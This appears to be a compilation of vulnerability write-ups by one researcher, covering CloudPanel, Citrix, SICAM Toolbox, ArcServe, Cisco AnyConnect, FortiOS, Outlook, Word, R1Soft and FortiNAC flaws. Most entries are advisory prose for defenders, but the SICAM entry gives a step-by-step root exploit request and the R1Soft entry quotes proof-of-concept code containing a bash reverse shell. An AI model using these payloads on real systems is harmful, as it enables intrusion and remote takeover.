cbeek-r7 (32)

A significant vulnerability has been detected in CloudPanel. The root cause is attributed to the default secret keys’ usage and the default user being set as “clp”.

Vulnerability Description:

1. No Session Authentication: CloudPanel’s file manager doesn’t enforce session authentication, resulting in a broken access control mechanism.
   
2. Cookie Manipulation: The vulnerability can be exploited when the encrypted value of the cookie named “clp-fm” is set using the default secret key. Upon decryption, this cookie’s value is a serialized string.
   
3. PHP Object Injection: Attackers can manipulate this decrypted serialized string to reset the user value to the default “clp”. Combined with PHP Object Injection, this can lead to more severe attacks.
   
4. Elevated Access: The vulnerability allows attackers to gain unrestricted access to the file manager, where they can then upload malicious files to the main CloudPanel directory.
   
5. Privilege Escalation: The default “clp” user possesses ‘sudo nopasswd’ rights, leading to a potential privilege escalation.
   

Technical Flow of the attack:

• The component /home/clp/htdocs/app/files/public/file-manager/backend.php receives the encrypted “clp-fm” cookie value.
  
• Post decryption, the value is deserialized. Exploiting this step gives attackers opportunities for post-exploitation, such as Remote Code Execution and Local File Disclosures.
  
• The deserialized value is utilized as an object – specifically to pass the ‘user’ value to the variable $user.
  
• Authentication to the file manager merely requires the “clp-fm” cookie. Once the decrypted cookie is passed, it provides backend unrestricted access. From here, the attacker can gain “clp” user rights, which essentially means root access.
  

In conclusion, the use of default configurations, the lack of session authentication, and the capability to inject PHP objects cumulatively pose a severe threat, enabling attackers to gain root access in systems using CloudPanel.

CVE-2023-36884 is a fixed vulnerability that permitted remote code execution. Attackers could manipulate Microsoft Office files to bypass the Mark of the Web (MoTW) security mechanism. This bypass allowed these documents to be accessed without a security prompt, facilitating remote code execution. In response to the once-mitigated but still exploited CVE-2023-36884 weakness, Microsoft rolled out an Office Defense in Depth patch as part of August 2023 Patch Tuesday.

The Russian cyber group, Storm-0978/RomCom, has been actively exploiting this flaw.

Summary:
A Cross-Site Scripting vulnerability has been discovered in Citrix ADC and Citrix Gateway versionslisted below.

Insufficient sanitization of URL query parameters before their inclusion in an HTTP Location header poses a security risk. Exploiting this vulnerability allows an attacker to create a manipulated link that, upon being clicked, redirects the victim to an arbitrary destination. Additionally, the attacker can insert newline characters into the Location header, prematurely terminating the HTTP headers and injecting an XSS payload into the response body.

Impact of vulnerability:
An attacker can leverage this vulnerability to construct malicious links that, when clicked, either redirect the victim to a website under the attacker’s control or execute JavaScript code within the victim’s browser.

Affected Software:
The following versions of Citrix ADC and Citrix Gateway are susceptible to this vulnerability:

Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
Citrix ADC 12.1-FIPS before 12.1-55.296
Citrix ADC 12.1-NDcPP before 12.1-55.296

Mitigation:
Follow the Citrix reference link to update to the latest versions that will fix the issue(s).

To exploit this vulnerability, an HTTP request including the command must be crafted. No / characters can be used, therefore commands are encoded as base64, e.g., “id” as “aWQ=“. The command must be provided as UPLOADFILENAME header.
A full command would look like this
echo aWQ=| base64 -d | sh #

The following header format must be obeyed:
e User-Agent: SICAM TOOLBOX Il
¢ Session-ID: [ARBITRARY 16 CHARACTERS]
e UPLOADFILENAME: [COMMAND]

Additionally, the request body must contain the following POST parameters:
« type=20
« length=[ARBITRARY]
¢ data=[ARBITRARY]

If it worked, the response body will be *type=21”, congrats you’re root now.

Remote Code Execution in ArcServe UDP Backup

A critical authentication bypass exists in ArcServe UDP Backup that affects versions 7.0 to 9.0.
By interacting with the service manipulating SOAP requests, it is possible to retrieve first details about the system including OS version, hostname, domain and administrator account name.

By forging a valid admin session with the discovered AuthUUID – ArcServe has an option to retrieve the admin password using the getLocalHostAsTrust method and request that from the ArcServe application.

The ArcServe application will return the value of the encrypted password that can be decrypted using the scripts provided by the authors of this vulnerability ( and in the reference link of this submission).

A security flaw has been discovered in the client update procedure of both Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows. This vulnerability could potentially enable a local attacker with low privileges and authenticated access to elevate their privileges to the level of SYSTEM. The client update process is triggered upon the establishment of a successful VPN connection.

When a user connects to the VPN, a background process called vpndownloader.exe is initiated. This process creates a directory in the c:\windows\temp location with default permissions, following the format <random numbers>.tmp. Subsequently, vpndownloader.exe checks if the directory is empty, and if not, it proceeds to delete all files and directories within it. This particular behavior can be exploited to carry out arbitrary file deletions under the NT Authority\SYSTEM account.

The vulnerability stems from the improper assignment of permissions to a temporary directory generated during the update process. An attacker can take advantage of a specific function within the Windows installer process to exploit this vulnerability. If successfully exploited, the attacker could execute code with SYSTEM privileges.

To mitigate this vulnerability, Cisco has released software updates that specifically address the issue. Unfortunately, there are no workarounds available to rectify the vulnerability apart from applying the provided software updates.

A Proof of Concept (PoC) has been released and can be found in the reference links.

Fortinet has issued an advisory regarding a critical vulnerability in FortiOS, known as CVE-2023-25610. This vulnerability poses a significant risk of remote code execution (RCE) and affects Fortinet’s operating system. Specifically, the vulnerability resides in the administrative interface and involves a buffer underwrite bug. Exploiting this flaw, an unauthorized remote attacker can execute code by utilizing specially crafted requests.

To mitigate this vulnerability, it is crucial for affected customers to promptly apply the available patch to their FortiOS instances. Upgrading to the patched versions is highly recommended to ensure system security.

CVE-2023-25610 is a buffer underwrite (or “buffer underflow”) exploit that impacts the administrative interface of FortiOS and FortiProxy. It arises when a program writes data to a buffer with a size smaller than the data itself, resulting in the overwrite of adjacent memory locations.

Exploiting this vulnerability could empower an unauthenticated attacker to remotely execute arbitrary code on the device or launch a denial-of-service (DoS) attack on the graphical user interface (GUI). To carry out such an attack, the malicious actor would need to send specifically crafted requests to the target device.

It is worth noting that a proof of concept for this vulnerability was published on March 11, which increases the likelihood of it being exploited in real-world scenarios.

Wiz Research data reveals that approximately 9% of cloud enterprise environments remain vulnerable to this particular flaw. Moreover, among environments utilizing FortiOS, a staggering 80% have yet to apply the necessary patch to safeguard against it.

This marks the another critical vulnerability discovered in FortiOS this year, with the previous instance, CVE-2022-42475, being rapidly exploited in the wild shortly after its disclosure. Therefore, it is anticipated that this latest vulnerability will likely face similar exploitation. Especially with a a few public exploit example being available.

The following product versions are affected by CVE-2023-25610:

• FortiOS versions 7.2.0 through 7.2.3
  
• FortiOS versions 7.0.0 through 7.0.9
  
• FortiOS versions 6.4.0 through 6.4.11
  
• FortiOS versions 6.2.0 through 6.2.12
  
• All versions of FortiOS 6.0
  
• FortiProxy versions 7.2.0 through 7.2.2
  
• FortiProxy versions 7.0.0 through 7.0.8
  
• FortiProxy versions 2.0.0 through 2.0.11
  
• All versions of FortiProxy 1.2
  
• All versions of FortiProxy 1.1
  

Fortinet has also acknowledged the potential vulnerability impact on other products. However, in those cases, an attacker would only be able to initiate a denial-of-service (DoS) attack rather than achieve remote code execution (RCE).

The vulnerability was detected in version 1.1.2 of the MiniDLNA service within the firmware version 2.1.6 Build 20220128 rel.15823(4555) of the TP-Link AX1800 WiFi 6 Router Archer AX20(EU). The exploit requirs either physical access or LAN access to the router. It could potentially enable an attacker to execute arbitrary code on the device, thereby granting unauthorized access and control over the router.

Microsoft reported having been notified by Cert-UA of a zero-day vulnerability in Outlook. This vulnerability was observed to be used by nation-state actors targeting Ukraine’s government, military, energy, and transport sector during Mid-April and December 2022.

By sending malicious Outlook notes and tasks, the attackers were able to steal NTLM hashes via NTLM negotiation requests by forcing the targets’ devices to authenticate to attacker-controlled SMB shares. These obtained credentials were used for lateral movement within the victim’s networks.

Attackers are able to craft an email that contains an extended MAPI property called PidLidReminderFileParameter for either a calendar appointment, note or task. This property can contain a remote UNC path to an SMB (TCP port 445) share on a threat actor-controlled server. The malicious email does not require any user interaction and the vulnerability can be triggered without either reading the email or viewing the email in preview mode, the vulnerability will be triggered automatically when the Outlook client receives and processes the email. Upon processing the malicious email, Outlook will access the UNC path to the attacker-controlled SMB share, which allows an attacker to perform an NTLM relay attack and access other internal systems.

CVE-2023-23397 impacts all supported versions of Microsoft Outlook for Windows but doesn’t affect Outlook for Android, iOS, or macOS versions.
Outlook on the web and Microsoft 365 do not support NTLM authentication and are not vulnerable to CVE-2023-23397

A vulnerability in Microsoft’s Word wwlib allows attackers to get LCE with the privileges of the victim opens a malicious
RTF document. An attacker would be able to deliver this payload in several ways including as an attachment in spear-phishing attacks.

Affected Versions

This vulnerability affects at least the following versions of Microsoft Office:

• Microsoft Office 365 (Insider Preview – 2211 Build 15831.20122 CTR)
  
• Microsoft Office 2016 (Including Insider Slow – 1704 Build 8067.2032 CTR)
  
• Microsoft Office 2013
  
• Microsoft Office 2010
  
• Microsoft Office 2007
  

Acknowledgement

This issue was discovered, analyzed, and reported by Joshua J. Drake (@jduck).

PoC code from @jduck:

The “ZK” Framework is an open-source Java framework for building enterprise web and mobile applications. The R1Soft Server Backup Manager utilises. this framework.

By bypassing the authentication process, uploading a ‘custom and weaponized database driver (JDBC) that contains a payload for creating a remote shell on the device is possible. Excerpt from one of the public PoCs with a detail in the weaponized JDBC driver:

static {
    String winCmd = "dir";
    String linuxCmd = "bash -i >& /dev/tcp/192.168.1.0/2022 0>&1";

    String[] cmds = null;

    if (System.getProperty("os.name").toLowerCase().contains("win")) {
        cmds = new String[]{"cmd.exe", "/c", winCmd};
    } else {
        cmds = new String[]{"/bin/bash", "-c", linuxCmd};
    }

One of the Incident Response blogs in the referrals from Fox-IT mentions that activity since November 2022 has been observed where this software has been compromised and a backdoor is running on these systems.

Recent reports on ransomware actors’ activity in 2022 abusing vulnerabilities during their attacks marked this particular vulnerability as being used. Once inside the network of a victim, this particular vulnerability can be used to elevate privileges and execute code under administrative rights.

Fortinet’s researcher Gwendal Guégniaud discovered a RCE vulnerability on the Fortinet NAC (Network Access Control) device. The vulnerability in the keyUpload.jsp file, allows an unauthenticated attacker to write arbitrary files on the system. As a result, the uploaded code will be executed under the user rights of root.

Since these types of devices sit at the network perimeter of companies, it is an interesting target as we have observed in many ransomware attacks, where the initial attack starts compromising a network perimeter device.

With the release of a PoC by Horizon3ai, ShadowServer’s Honeypots has already reported scanning activity.
The exploit has been tested and works against vulnerable devices: